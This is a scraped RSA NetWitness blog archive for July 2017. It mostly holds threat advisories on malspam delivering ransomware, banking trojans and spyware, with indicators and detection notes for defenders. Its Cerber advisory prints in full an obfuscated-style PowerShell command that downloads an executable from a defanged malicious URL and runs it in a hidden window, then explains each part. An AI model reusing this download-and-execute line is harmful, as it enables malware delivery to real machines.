Skip navigation
All Places > Products > RSA NetWitness Platform > Blog > 2017 > July

Malspam activity was noted on July 26 2017 delivering GlobeImposter ransomware. This threat advisory will shed some light on the activity from the perspective of NetWitness Packets and NetWitness Endpoint.


Scan results of a delivery document can be found here. Submitting the file to RSA pre-release What's This File service shows the highest threat score with different suspicious characteristics:



Upon running the embedded VBA code, traffic was observed to a delivery domain to download an obfuscated payload:




This network behavior was shared among multiple infected machines:



The download sessions were tagged with the following meta values in NetWitness Packets: 



The downloaded payload is de-obfuscated and saved to the user's %Temp% directory as hurds8.exe:



VirusTotal scan results of that executable can be found here. Here is the analysis report from


The binary starts by copying itself to a new directory and by modifying the registry to gain persistency on the system:




It also drops and runs a batch script in the %TEMP% directory with typical instructions for ransomware:



The screenshot below shows part of the tracking history of an infected machine:



The following screenshot shows the module IIOC's for hurds8.exe as well as its tracking information:



Notice in the tracking data how the ransomware is using .707 extension to rename the newly encrypted files. This GlobeImposter variant drops the following ransom note:



GlobeImposter delivery documents (SHA256):

  • 5d0eb492f4f36bfd871f6399dc777b9abb1436d18fdf7f1e737ff36ab86fb5b1
  • 4e4ded4a9aa9122594389adba17f4b6ad6ad5f37b1353274a69a09f737c03789


GlobeImposter ransomware variant (SHA256):

  • a1cde05bb37cecfecc2ccfb57807d2db66393d73c6e88e129507ffcb70f0ba2e


All the IOC from those HTTP sessions were added to FirstWatch Command and Control Domains feed on Live with the following meta values:

  • threadt.source = 'rsa-firstwatch'
  • threat.category = 'malspam'
  • threat.description = 'delivery-domain'


As threats evolve it's important for organizations to keep pace. As part of this trend many organizations are moving to Slack for team communications and to help drive a more efficient operational workflow. You can use the NetWitness Suite to help drive some of the changes as well. In this post we'll look at how you can send ESA alerts from NetWitness to Slack using the 'run script' capability.


First start off by configuring Incoming Webhooks in Slack, you'll need to take note of the URL, Username and Channel that you configured your webhook for. These allow the script to communicate from NetWitness to Slack.


Next, in NetWitness, go to Configure -> ESA Rules and select the rule you want to add Slack notifications for. Then click on Global Notifications, this will allow you to add the script, notification server, and template.


On the Output tab,click the + sign, and select Script. Paste the following into the box, give it a name and click save.





escapedText=$(echo $text | sed 's/"/\"/g' | sed "s/'/\'/g" )

json="{\"channel\": \"$channel\", \"username\":\"$username\", \"icon_emoji\":\"ghost\", \"attachments\":[{\"color\":\"danger\" , \"text\": \"$escapedText\"}]}"

/usr/bin/curl -s -d "payload=$json" "$webhook_url"

Click the Servers tab. If you don't have an entry for 'Script' then, click the + sign and add one and click save. This allows scripts to be run off the local host (ESA server).

Finally, you can use an existing template, but I created my own for simple alerting. You can do this by clicking on the Templates tab, then the + sign. Finally add the following information and click save.

Finally, select your new values in the rule, and deploy the modified ESA Rule(s).

Now you can enjoy your new Slack integration, and get alerts into various channels.

Malspam activity was noted on July 20 2017 delivering BEBLOH banking trojan. BEBLOH has been around since 2009 and has the ability to steal money from unsuspecting victims right off their bank accounts [1]. Based on the noticed delivery documents it seems this campaign is targeting users in Japan. 


Scan results of a delivery document can be found here. Here is a screenshot taken of the malicious spreadsheet:



Submitting the spreadsheet to RSA's pre-release What's This File service shows maximum threat score:



What's This File service also shows the embedded VBA code:



Here is the host behavior upon opening the delivery document on a machine with RSA NetWitness Endpoint agent installed:



Obfuscated powershell code is used to download an executable to a local directory. The screenshot below shows the download activity in RSA NetWitness:




VirusTotal scan results of the download executable suggest it is a BEBLOH variant. The EXE is saved to the user Documents folder as %appdata%.exe



Here is the process tree:



The download sessions are tagged with different meta values in RSA NetWitness including http two headers, http no referer, http no user-agenthttp get no post under Service Analysis and exe filetype under File Analysis



BEBLOH delivery documents (SHA256):

  • fc0d7e53b0d55232a4a89614841ec77f022aab845a08dd4cbc47d3d6d35fc641
  • d82f57b4ab676ae02c710becedf9a0883f935fee89abf98c010c1a8b122b7140
  • 87d3eb0c512568c3cbe931670680b77d3f039312279f6817542dc612619d6449


BEBLOH Trojan (SHA256):

  • 29c7740f487a461a96fad1c8db3921ccca8cc3e7548d44016da64cf402a475ad


All the IOC from those HTTP sessions were added to FirstWatch Command and Control Domains feed on Live with the following meta values:

  • threadt.source = 'rsa-firstwatch'
  • threat.category = 'malspam'
  • threat.description = 'delivery-domain'



  1. TrendLabs Security Intelligence BlogBEBLOH Expands to Japan in Latest Spam Attack - TrendLabs Security Intelligence Blog 

During the early weeks of July, malspam activity delivered a malicious word document, which uses macros to download and execute a Cerber ransomware payload. This is not a new exploitation vector. Macros are often abused to perform malicious tasks, like downloading and dropping malware. Victims can easily be tricked into running the malicious macro.



Submitting the delivery document to What's This File service shows more information about the malicious word document.



This activity and more is also captured in the process tree below shows the series of events that led to downloading and executing a Cerber payload:



The macro in our MS Word Document calls PowerShell to connect to the malware’s distribution website to download and run an executable:


powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://dastonond[.]top/admin.php?f=1.jpg'.Split(',');$name = $, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}


Line-By-Line analysis of PowerShell Command:


  • First line of the command opens the PowerShell application from the Windows System32 directory

-WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;

  • Opens PowerShell as a hidden window so it is not visible to the victim.
  • The variable “$wscript” is created and assigned to the created WScript.Shell instance. 
  • WScript.Shell provides access to the OS shell methods,which substantially increase the capabilities and the types of applications that PowerShell can interact with.

$webclient = new-object System.Net.WebClient;

  • The variable $webclient is created and is given a System.Net.WebClient instance. 
  • The WebClient class provides a list of methods that allow the instantiated object to send and receive data from web servers identified by a URL.

$random = new-object random;

  • This command simply creates a new instance of a random object ($random).

$urls = ‘http://dastonond[.]top/admin.php?f=1.jpg'.Split(',')

  • The $urls variable is assigned to a malicious binary hosted on a malicious domain. 
  • This variable is also capable of stringing together multiple binaries hosted on different domains by simply separating the different URLs with commas. 

$name = $, 65536);

  • The $name variable is assigned a random number from the $random variable between 1 and 65536.

$path = $env:temp + ‘\’ + $name + ‘.exe’;

  • The $path variable is set to the Windows environment variable directory which points to the user’s AppData temp folder. 

foreach($url in $urls){try{

  • The script iterates through each URL given in the $urls variable and runs the subsequent commands on it.

$webclient.DownloadFile($url.ToString(), $path);

  • The $webclient variable is used to download a file from the website in the $urls variable to the path specified in the $path variable. 

Start-Process $path;}break;}

  • Executing downloaded fine and if the command failed to return a process and continued silently, the window remains hidden and the process breaks.

catch{write-host $_.Exception.Message;}

  • This is another mechanism to keep the script running silently in the background.


In our case, it downloads a JPG file. Well, it is actually a PE file saved to C:\Users\<user>\AppData\Local\Temp\5356.exe". It runs and starts to spawn a number of processes to gather information and to encrypt files on the infected system.   



VirusTotal analysis of the dropped file confirm it’s Cerber Ransomware:



Once the ransomware has successfully installed, post-infection traffic shows typical Cerber beaconing UDP spray out to 77.12.57/24 on port number 6893.



Current NetWitness detection flags both payment domain (key.dga.tld pattern) as 'cerber ransomware' and the UDP spray as 'cerber beacon' in the <Indicators of Compromise> meta field. 



Additionally, <File Analysis> flags for 'js eval no docwrite' and 'exe filetype but not exe extension' should be noted as indicators of possibly malicious files.



All the IOCs are added to the following feeds on Live:

  • RSA FirstWatch Command and Control Domains
  • RSA FirstWatch Command and Control IPs

For more information on Cerber ransomware, its evolution and detection techniques using RSA NetWitness, Please check the following RSA Link articles:



Thanks go to Ahmed Sonbol and Kevin Stear for contributing to this threat advisory.





The cloud is becoming the go-to infrastructure of choice for enterprises worldwide. Why? First and foremost, cloud computing has significantly more flexibility when it comes to scale. If you are leveraging Amazon Web Services (AWS), it takes minutes to spin up an EC2 instance, whereas expanding on-premises infrastructure can take weeks or months. Secondly, organizations can save on infrastructure costs and resources with the cloud and shift budgets to other areas as needed. But despite the obvious benefits the cloud brings, it is still important to have effective security policies in place to protect workloads no matter where they reside.


That is why Gigamon and RSA have come together to create a joint integrated solution for AWS customers. Let’s hear from Sesh Sayani, director of product management – cloud at Gigamon, to learn more about what Gigamon and RSA can offer to enterprises moving to AWS. 


What kind of challenges are you seeing from customers who are moving to the cloud?

When organizations first started moving to the cloud, they were migrating their Tier 2/3 applications and workloads. Now, as on-premises infrastructure cost and complexity continue to rise, enterprises are beginning to move their mission-critical applications to the cloud as well.


This “lift and shift” of Tier 1 applications, however, has raised eyebrows, especially by security architecture teams. When moving to the cloud, enterprises lose visibility into traffic in and out of their workloads. Security teams are concerned about gaining the necessary insight in order to maintain effective forensics, prevent accidental data loss and prepare for security incident responses.


Endpoint or malware protection is not sufficient to gain full application insight. To get full visibility, deep packet inspection is required for effective forensics, analysis and protection.  To address this, agents can be deployed in the workloads for traffic inspection. But, for a comprehensive security posture, multiple tools may be required – for example, IDS, SIEM, DLP. Adding so many agents in the workloads is neither a scalable nor cost-effective approach to address this challenge.


Can you please tell us a bit about the Gigamon Visibility Platform and the benefits for Amazon Web Services (AWS) customers?

The Gigamon Visibility Platform is the first pervasive visibility solution for the cloud that provides full and deep traffic visibility into your workloads in AWS. This platform is made up of three main elements:

  • GigaVUE-FM Fabric Manager: Orchestration component that ensures scale, automation and elasticity across your AWS deployments.
  • GigaVUE V Series: Virtual visibility nodes deployed as AMIs, used to aggregate traffic across multiple EC2 instances and send customized traffic to multiple security tools as needed.
  • G-vTAP agents: Used to gain access to the traffic from the EC2 instances to the GigaVUE V Series nodes.


The Gigamon Visibility Platform can be deployed either on-premises or in AWS. That means organizations don’t have to duplicate the tools they are running on-premises and in the cloud. Let’s take a quick look at an example. If you are running tools on-premises, you don’t want to be forced to deploy additional tools in the cloud because this will drive up cost and the need for resources. Instead, deploy the Gigamon Visibility Platform on-premises and backhaul network traffic of interest to your on-premises tools.


Gigamon and RSA have been partners for a while – what are your thoughts on this partnership?

It’s a great partnership and one that we want to continue to expand. RSA is a recognized industry leader in security and now that we both have solutions available for AWS, we can jointly provide a highly scalable, flexible offering that provides visibility and security for our customers across physical, virtual and public cloud deployments.


How does Gigamon integrate with RSA on AWS and what are the benefits to customers?

The Gigamon Visibility Platform for AWS includes our lightweight G-vTAP agent, which is deployed on different EC2 instances. The agent copies the network packets, which are aggregated in the GigaVUE V Series node where we apply traffic intelligence and then send the desired network traffic to the RSA NetWitness Suite decoder for deep content inspection. The benefit to customers is full packet capture across compute instances, which provides RSA NetWitness Suite with the ability to identify and mitigate potential threats faster.


Gigamon and RSA have put together a joint Test Drive – why would this be exciting for customers?

A Test Drive is a great way for our customers to see first-hand how these solutions work and perform in an AWS environment. With this joint Test Drive, customers can see how the Gigamon Visibility Platform provides automated insight into AWS workloads, applies GigaSMART traffic intelligence and distributes copies of traffic. Additionally, customers can see how the RSA NetWitness Suite gathers traffic from the Gigamon Visibility Platform to investigate / identify potential threats to your AWS applications and workloads.


Want to learn more?


If you’re attending Black Hat July 26-27, come check out the RSA booth #907 to speak to Gigamon and RSA product experts.


You can also join us at Gigamon's Cloud Field Day 2. Register today!

With today’s ever growing threat landscape, the volume, sophistication, and potential damages of attacks is increasing. It is becoming increasingly harder to stop attackers from entering your system networks, isolating their motives, and most importantly removing them once they are there.  A typical security environment uses multiple disconnected technologies, supplying an immense amount of information.  Prioritizing a specific piece of data is important to responding quickly to attacks.  At a higher level, however, there is a need to understand if the security strategy is really effective for the business.  In summation, businesses need to change their security strategies.


The solution?  RSA provides a top down approach strategically linking business risk management with security events and priorities

  • Make security teams operationally more impactful
  • Strategically manage business risk

By bringing different practices together, linking security incidents with business context allows security teams to respond faster to protect what matters most.

The RSA suite of tools

  • Keeps the bad actors out, but allows entry to those that have legitimate need to easily access the system
  • Enables visibility and analytics to view the big picture to provide insights into specific attacks
  • Provides business context linked to contextual intelligence for a more informed approach
  • which can then be translated into action

The video in this eLearning discusses how RSA’s tools provide both the detailed information linked to the business context to protect the most sensitive assets.

The idea of a mathematically secure chain of blocks was first mentioned in 1991, first conceptualized as digital currency in 1998 as "Bit Gold" and first implemented as decentralized digital currency as "Bitcoin" in 2009.


Blockchain is nothing but chronological chain of blocks where every block contains a set of transactions/records and a reference to the previous block. This idea of a blockchain helps in establishing a digital ledger; which is immutable and can be distributed in a way that peers in the network can come to a global consensus on adding new blocks and also agree on the true state of ledger. This ledger is not at one place but its copies are with all the participants in the distributed network. These copies are updated at same time when all the participants come to a consensus. The privacy and anonymity depends upon the implementation of blockchain.


Blockchain can be implemented in many areas such as finance, banking and real estate. There are a wide variety of implementations already in the market. However, the biggest implementation is in the field of cryptocurrency. There are many cryptocurrencies available and two major currencies are Bitcoin and Ethereum.

Bitcoin is a digital payment system and a cryptocurrency. It can be used for transactions all over the world with no central authority or bank involved. There are participant nodes in Bitcoin network that have the copies of Bitcoin distributed ledger. Six times every hour, a group of transactions is collected in a block and that block is added to the blockchain. Then all the participating nodes are synced with this change in the blockchain.


Adding new blocks to the chain is called mining. The miners do the following:

  1. They verify if the transactions are valid which helps resolving double-spending problem (i.e. same digital token is spent twice).
  2. Group transactions in a block.
  3. Give reference of the most recent block in the new block about to get created.
  4. Solve a mathematical proof-of-work problem. This is the step where race starts between all the miners and the winner add the new block in the chain and get funds in the mined currency as a reward.
  5. When the mathematical problem is solved the new block is added and the change is communicated along the network with all participating nodes.


The following graph by PwC can help you in understanding the flow of a transaction in the world of cryptocurrency [1].




With the rise of ransomware in the past couple of years, cryptocurrency and in particular Bitcoin gained more popularity. Due to the level of anonymity it provides, Bitcoin became the criminals’ preferred currency to receive the ransom thus playing an important part in the ransomware ecosystem. In the aftermath of a ransomware attack victims hasten to follow the criminal instructions in order to buy bitcoins and to pay the ransom to recover their files. There is no guarantee that a victim would get its data back and the general advice is not to pay the ransom [2]. However, for some organizations that fall victims to those attacks that is not an option and they are more willing to take the risk. In fact some companies started stockpiling Bitcoins in anticipation of ransomware attacks so they can recover their data as quickly as possible [3].


Another threat to organizations is the rise of cryptocurrency mining malware. This class of malicious software infects a victim machine and enrolls it in a larger mining botnet. Cryptocurrency mining uses a lot of system resources and might degrade its performance. Recently Proofpoint security researches released a report about Adylkuzz cryptocurrency mining malware [4]. Adylkuzz was spreading via EternalBlue/DoublePulsar exploits and was used to mine Monero; a cryptocurrency that has enhanced anonymity capabilities and used in the dark web markets.


Cryptocurrency is not a new technology but as it is getting more attention, it is our hope that this post can help in answering some of the basic questions. Future advisories will cover any emerging threats in that domain and will shed some light on detection techniques using RSA technologies.


Thanks to Prakhar Pandey for contributing to this blog post.




This RSA University Navigator is part of an ongoing campaign by RSA University to make it easier for RSA NetWitness customers like you to find relevant product training. The RSA University Navigator allows you to filter content based on your role within your organization, the skills you would like to develop, and your expertise using RSA NetWitness.


The RSA NetWitness Suite Navigator will be updated frequently to ensure you are receiving the most up-to-date content available. There is a dedicated team of RSA professionals at RSA University here to help you take charge and power your way to success with the RSA NetWitness Suite. Over time, we will also update this tool to include NetWitness Endpoint Training.


In our continued efforts to provide the best content available, we rely on your feedback. If you cannot find what you are looking for in the Navigator, please reach out to our team by contacting us:


 You can find the RSA University Navigator Tool on the main RSA University page or by navigating to the following URL:

We know you really want to join the more than 2,000 security, risk and compliance professionals at the premier Business-Driven Security event, RSA Charge 2017, Oct. 17-19 in Dallas. Now you have one final, limited opportunity to enjoy a $300 savings with our ‘throwback’ to the Early Bird Discount Rate of $645.


This is your opportunity to network with RSA customers, partners, and industry experts while discovering how to implement a Business-Driven Security  strategy in an increasingly uncertain high-risk world.


Use the Throwback Thursday code 87CTHRWBCKJUL and save $300 on your attendee pass.


Need a little more convincing, in addition to the $300 savings? Well, we have this covered too!


Check out our latest Keynote Lineup, including

  • Marc Goodman, Global Security Advisor, and Futurist will explain how to cultivate informed workforce to create a human firewall, in what promises to be a highly engaging and humorous keynote presentation


Sneak Peek at our Upcoming Agenda of robust programming you can expect at RSA Charge 2017. Tracks include:

  • Taking Command of Your Risk Management Journey
  • Transforming Compliance
  • Managing Technology Risk in Your Business
  • Inspiring Everyone to Own Risk
  • Detecting and Responding to Threats That Matter
  • Secrets of the SOC
  • Identity and Access Assurance
  • Reducing Fraud, While Not Reducing Customers
  • RSA Archer Technical
  • RSA Archer Technical, Advanced


Don’t miss out on your chance to attend RSA Charge 2017 with the limited ‘Throwback Thursday’ event. Use code 87CTHRWBCKJUL to register.


Discount code expires Thursday, July 27, 2017, at 11:59 PM PST. Offer cannot be combined with any other promotional code.


In the early weeks of July 2017, the Necurs botnet supported a large malspam campaign delivering TRICKBOT via macro-enabled MS Word documents.  While multiple documents were noted in Virus Total submissions, Lloyds Bank was specifically used/mentioned within one decoy document entitled "Protected.doc".




These documents all contain macros with malicious VB Scripting that maxes out scoring in RSA's pre-release, as shown below.  Note the three findings of interest: "Document Contains VBA Code", "VBA Code Contains Auto-Launch Scripts", and "VBA Code Contains Reference to Launching EXEs".  These are all bad things...



Upon opening, the attachment downloads a PNG file that is actually an executable; this is the TRICKBOT payload.  In several instances, we observed multiple download domains involved with this delivery.  In the case below, the first download domain (rbsbuilding[.]co[.]uk) fails with a 404 and a second download domain, ccbenelux[.]nl, successfully delivers our payload, baglosnot32tritony.png.



Post infection, we did not observe TRICKBOT Command and Control (C2) in our own sandbox detonations (probably due to a delay prior to the begin of periodic 3 minute beaconing).  However, we did note probable C2 check-in behavior in related Virus Total PCAPs, specifically TCP SYNs out to a number of known related IP addresses.  




This beaconing was also easily observed in NetWitess Endpoint (aka ECAT), where a telling screen shot shows "butrz.exe" creating a suspect "svchost" process every 3 minutes.



ECAT also flags a number of IOCs that warrant concern.



With regard to the packet detection of TRICKBOT, NetWitness meta data clearly identifies behavior indicative of malicious activity.  Specifically, our macro-enabled MS Word document produces meta for session.analysis of "first carve not dns", service.analysis of "http no user-agent" and "http no referrer", file.analysis of "exe filetype but not exe extension".  This are all strong indicators that something malicious is going down.



As referenced in the opening, this activity appears to be part of a larger ongoing TRICKBOT campaign; below is some related activity we have observed thus far in the month of July.



All related IOCs have been pushed to the FirstWatch_C2_Domains and FirstWatch_C2_IPs feeds and are available to customers via RSA Live.  Thanks to Ahmed Sonbol, Christopher Ahearn and Prakhar Pandey for their assistance with this analysis.



Thanks for the banner picture @Vitali Kremez (@VK_Intel) | Twitter.

Despite increasing investments in security, breaches are still occurring at an alarming rate. Whether the result of cyber criminals sending phishing or malware attacks through company emails, nation states targeting organization’s IP, or insiders misusing sensitive data, we live in a world where prevention of breaches has become impossible. Given the speed at which cyber criminals are able to create new security threats, companies must change their approach to security.  It is time for the centerpiece of our security operation to evolve – for SIEM to finally deliver what it has promised for decades.


We are thrilled to announce, that is exactly what we are delivering. We’ve redefined modern security operations with a new kind of SIEM: the RSA NetWitness® Suite. 


Of course, we have all the traditional SIEM requirements like compliance; but it is built to be laser focused on security – to rapidly detect and respond to today’s known and unknown threats – before they do damage.


The latest release of the RSA NetWitness Suite delivers end to end visibility across the organization – from logs, network, endpoints and threat intelligence - in a brand new, highly intuitive and blazing fast user interface. The new user interface was designed from the ground up after 100s of hours of security analyst interviewing and testing. The new Respond and Investigate workflows make it easy for security analysts to triage information rapidly because they have all the information they need in one screen - and will make threat hunters even more impactful by providing them insights and drills into all the data, business context and threat intelligence they need. From novice to hunter – these workflows will make any security analyst better at defending their networks. 


                                                                                 RESPOND: Interactive Nodal

We continue to focus on improving the efficiency and effectiveness of security analysts of all levels, by providing out of the box machine learning and behavior analytics for alerting and detection and by prioritizing the most important incidents based on business risk – from identity and asset criticality data. The new RSA NetWitness Suite is a force multiplier for security analysts and incident responders.


Ultimately, the RSA NetWitness Suite enables analysts to detect and investigate the full scope of an attack and more rapidly respond to those threats that matter the most to an organization.


You need to see it for yourself. You can learn more by visiting:

During the first week of July 2017, malspam activity was observed delivering AgentTesla malware, a spyware capable of key and clipboard logging, screen capture, and stealing passwords from browsers [1][2]. This threat advisory will discuss its delivery methods and traffic analysis using NetWitness Logs and Packets.


The observed delivery document (File name: document.doc) was originally uploaded to Virus Total on July 7th and is named “document.doc”. This MS Word document contains embedded and obfuscated macros recorded in VBA, which are auto-launched upon opening. This document when submitted to RSA’s pre-release What's This File service had maximum threat score.



As indicated below, the cleansed VBA code contained within the document uses Document_Open to auto-launch of script and then Shell to launch an executable.



Following the process tree, powershell.exe is called to download “filenew.exe” from findmylogs[.]com and save the payload, a malicious executable saved as “prcQE.exe” in the “\AppData\Local\Temp” folder.





NetWitness packet inspection flags the following meta data from this activity.



An RSA NetWitness Endpoint (aka ECAT) agent installed on the affected client machine shows the following tracking information and machine Indicators of Compromise (IOCs).




After the victim is infected, AgentTesla begins outbound communications via HTTP POSTs to onlinesypoi[.]com. Highlighted fields below represent a possible signature for Agent Tesla spyware [3].




The domain onlinesypoi[.]com itself was also observed delivering AgentTesla binaries.






Scan results for those binaries can be found here and here.


All the IOC from those HTTP sessions were added to RSA FirstWatch Command and Control Domains on Live with the following meta:

  • threat.source = ‘rsa-firstwatch’
  • threat.category = ‘malspam’
  • threat.description = ‘delivery-domain’


Thanks to Kevin Stear and Prakhar Pandey for contributing to this threat advisory.



  3. In-Depth Analysis of A New Variant of .NET Malware AgentTesla | Fortinet Blog 
Robert Conley

Necurs Delivers

Posted by Robert Conley Employee Jul 13, 2017

The shotgun effect

Botnets are the shotgun within a cybercriminal's arsenal.  They provide an amplified delivery mechanism for malware and other threats.  Deployment varies, but they are typically installed on an unsuspecting victim's system through the use of an exploit kit (EK).  They compromise a known system vulnerability to allow unauthorized access.  After taking control of a large group of systems, commonly referred to as zombies, a ‘botmaster’ will use them to conduct nefarious activities, like sending spam.


Some botnets are reported to have over one million zombies.  That’s a lot of spam blasted across the internet, and perhaps what Necurs is best known for.


This article will discuss the Necurs botnet, its architecture, highlight recent, notable payloads, and identify how RSA NetWitness products can identify it.




Necurs is one of the largest botnets, some claim it's the largest.  Reports have it containing upwards of six million endpoints [1]. It was identified in 2012 and remains active on the threat landscape.  Its activity has seen periodic ebbs, but Blackhats continue using it.  With regards to payloads, Necurs has been responsible for delivering many high profile malware campaigns including Dridex, Locky, and Jaff.  It has also been used to transmit a slew of other spam and phishing attacks.  Security researchers recently observed that a new module was added to carry out distributed denial of service (DDoS) attacks [2].


Necurs is a highly resilient piece of malware.  Its strength and longevity can be attributed to many factors including a kernel-mode rootkit [8], modularity, anti-AV features, and domain generation algorithms [8].  Additionally, it contains a hybrid network architecture which leverages two different Command and Control (C2) models.


The first model uses centralized C2 servers and a flat hierarchy for managing and organizing a legion of zombies.  Although effective, it's also a weakness because it offers a central point of failure.  If law enforcement or other appropriate parties can disable or even blacklist a couple of servers they will have impacted the botnet.


To mitigate this weakness, Necurs uses a second model which has built-in peer-to-peer communications to provide C2 server redundancy [3].  Conceptually, it constitutes a meshed network wherein every node, server and client, talks to each other.  If one server becomes inaccessible others will not only detect it, they will initiate operations to promote another to replace it.  In so doing, they regain control of any orphaned zombies.


Detecting Necurs, or any botnet for that matter, is challenging because of its custodial role as a transport vehicle for other malware. Its presence is discreet and often discovered only after the transported malware has been exposed. With this in mind we’re going to discuss detection first as it pertains to transported malware, and then on Necurs.




  • Jaff Ransomware

In May 2017 the Jaff ransomware was being delivered globally via a large, malicious spam campaign.  Researchers determined that its source was the Necurs botnet [4].  The malspam contains a PDF attachment.  Opening it shows one line of text, Figure 1.

Figure 1



A user is then prompted to open the embedded Word document, Figure 2.

Figure 2



Embedded Javascript macros open the Word doc which then download and execute an encrypted binary, the Jaff ransomware loader.  Analyzing the Word file on produces a high threat score, Figure 3.

Figure 3



Figure 4 shows a Jaff Request/Response event using NetWitness for Logs and Packets.

Figure 4



The event’s meta, shown in Figure 5, is then reviewed to understand why the session was flagged.  In this instance, both host name and header count are strong indicators of suspicious activity.

Figure 5



After a victim's files are encrypted a ransom note file is dropped.  In it are instructions to visit a payment portal site.  Once there, a user can make a bitcoin payment in order to decrypt their files.


Kaspersky Lab provides a free decrypter utility for Jaff ransomware.  Their RakhniDecryptor application, version, can unlock files having either .jaff, .wlu, or .svn extensions [5].




  • Locky ransomware

First seen in 2016, Locky ransomware was sent via a Necurs spam campaign to millions of unsuspecting victims [7].  Each email contained an attached Microsoft Word document laden with malicious macros.  It’s engineered to execute when opened by the user and then downloads the loader.


A sample of Locky network traffic, seen in Figure 6, shows network communications direct to an IP address as opposed to a host name.

Figure 6



Figure 7 shows the Request contains a Post command instead of a typical Get. The infected host could either be transmitting data back to the downloader site or grabbing executables.

Figure 7



A close inspection of the streams confirms files are being sent, Figure 8.

Figure 8



Locky and Jaff share some common characteristics.  For example, they’re both ransomware, delivered via Necurs, and have similar payment pages.  Is it possible Jaff is a newer version Locky?  This doesn’t appear to be the case based on analysis conducted by RSA’s Data Science team.  The scientists applied fuzzy hashing techniques to executable code fragments and import libraries of each malware.  Their findings indicated a low degree of confidence that there’s a shared code base between the two. 



  • Trickbot Banking Trojan

In early June 2017 security researchers identified an email campaign delivering the Trickbot banking trojan.  Closer examination of the infection chain revealed that it was identical to that used for the delivery of Jaff ransomware.  This leads them to conclude that the Necurs botnet was the delivery mechanism [6].  Trickbot first appeared in late 2016 and targeted banks in the UK and Australia.  The current campaign has expanded targets.  Now included are France, Sweden, Norway, Finland, and Denmark.


Viewing Trickbot network traffic using RSA NetWitness Logs and Packets reveals the following about the malware.  It sends HTTP traffic over a non-standard port, Figure 9.

Figure 9



A closer examination of the sessions reveals HTTP traffic is being sent over port 443, instead of the standard port 80.  The destination is, Figure 10.

Figure 10



The session’s details present an exchange wherein a Get command retrieves an obfuscated cookie, Figure 11.  This will be injected into a user’s browser.  The server responds with a 404 Not Found page.  This is a diversion.  It’s used to distract the victim while the infection process executes.

Figure 11



Existing reports confirm the cookie is associated with the Trickbot Trojan.  Figure 12 shows one from  Also seen is the ip address/port combination which were already identified.

Figure 12





  • Pump and dump spam

In early 2017 a significant upswing in pump and dump spam traffic was observed by the security industry.  The campaigns claimed to provide insider tips and information on supposedly ‘hot’ stocks. In reality, they were merely a social engineering ploy to entice recipients to buy now and then enjoy a handsome return on their investment at a later date [8].  This type of scam isn’t new.  As in the past, the goal is to pump up a stock’s price. After this happens, the perpetrator’s sell their shares and pocket a nice profit.  Close examination of email header configurations and recipients’ lists revealed strong similarities to previous Necurs based campaigns.


Figure 13 shows an email which targeted InCapta Inc (INCT). 

Figure 13, source



The stock’s price spiked during the spam run, Figure 14.

Figure 14, source



Unwanted emails of this nature can easily be filtered at the email server level.  In addition, using a messaging authentication protocol is another means of blocking unsolicited emails. The Domain-based Message Authentication, Reporting & Conformance protocol is one example,



  • Detecting Necurs

RSA NetWitness products can alert on and detect botnet activity in many different ways.  To illustrate, here’s a brief hunting exercise on Necurs malware in a controlled environment.  To facilitate it a few preliminary steps were taken.  They included detonating known Necurs malcode in a sandbox and pre-populating indicators of compromise (IOCs) into an RSA Live feed.  Clearly, these steps improved detection results. However, their primary purpose was to improve the clarity and logical flow of this hunting exercise as well as to demonstrate botnet activity.


To begin hunting I used NetWitness Security Analytics and loaded the RSA Threat Analysis profile, I focused on the meta labelled c2-domain, c2-ip, hostname aliases, and beaconing, all of which represent botnet behavior.  Beaconing is when zombies send small messages, often over either Transport Control Protocol (TCP) or Hypertext Transfer Protocl (HTTP), to C2 servers at predetermined intervals.  They’re used to exchange updates, get instructions, and issue keep-alive heartbeats.


Figure 15 shows captured network traffic.  Necurs IOCs appear in the c2-domain and c2-ip meta.

Figure 15


Hostname-aliases is a subset of the c2-domain category., circled in red in Figure 16, has been flagged.  It warrants closer scrutiny.

Figure 16



Cross referencing it on reveals malicious activity, see Figure 17.

Figure 17



Performing a double check on the domain’s reputation, using a site like, is a good next step.  The results, see Figure 18, support the findings in the previous step.  Its integrity is questionable.

Figure 18



Returning to the Security Analytics interface, I proceeded to drill down on in order to identify destination IP addresses.  I chose one to check,, shown in Figure 19.

Figure 19



Searching this IP address on confirms malicious network traffic has been detected, Figure 20.

Figure 20


Returning to Security Analytics, I next investigated TCP beaconing meta, Figure 21.  It, too, confirmed Necurs activity.

Figure 21




Necurs is a massive botnet, possibly the largest in the world.  Its architecture has received periodic updates which have contributed to its versatility and longevity.  It has a track record of effectively using spam email to deliver ransomware, banking trojans, and many other malicious payloads.  Threat actors use Necurs’ wide reach to quickly saturate targeted markets with their campaigns, thereby increasing its potential infection rate.  


Thanks to Steven Sipes, Kevin Stear, Ray Carney, Ahmed Sonbol, and Lisa Bayen for their contributions to this blog post.






























Necurs IOCs added to the RSA C2-IP and C2-Domain feeds















Additional reading

Recently, I was using Netwitness Endpoint (ECAT) to help triage a large environment.  During this time, I identified a few systems that were exploited by malicious html file.  It was part of a phishing campaign that came in via email.  Unfortunately, I was unable to find the file because it was no longer in the Outlook Temporary Internet Files folder.  However, since we have tracking data coming in from the agents, I was able to recreate the scene even without the initial malicious code.


The original compromise showed tracking data like the one below:



Here we can see that Outlook starts up Chrome to open a file in the Outlook Temporary Internet Files directory.  From there we see regsvr32.exe kicked off that had a URL in it's launch arguments.  The regsvr32.exe is a legitimate and signed Microsoft file used to register DLL's and other controls into the Windows Registry.  Last year, researcher Casey Smith described how this component could take a URL to a remote file as an argument to bypass various security controls.  The URL could be over HTTP or HTTPS and would point to an SCT file.  This SCT file is really just an XML file with instructions on what regsvr32.exe should do.


With the tracking data showing us step by step what occurred on the system, we can use these commands on a different system and attempt to recreate the infection.  


On my analysis system, I opened a command prompt and ran that started this off.  


This URL took us to the malicious script on a Google API site over SSL.  The contents of that SCT file can be seen below:



In there we see the syntax the JSRat is going to execute leveraging mshta as well as another URL.  This new 'terra' URL sends another XML scriptlet to download and install a malicious dll called 'rubyonrais.dll'.




Tracking data in our analysis system looks very similar to what our original host showed along with the registering of the DLL.



If we take a look at the network traffic associated with this, we can get insight into what was happening as well.  



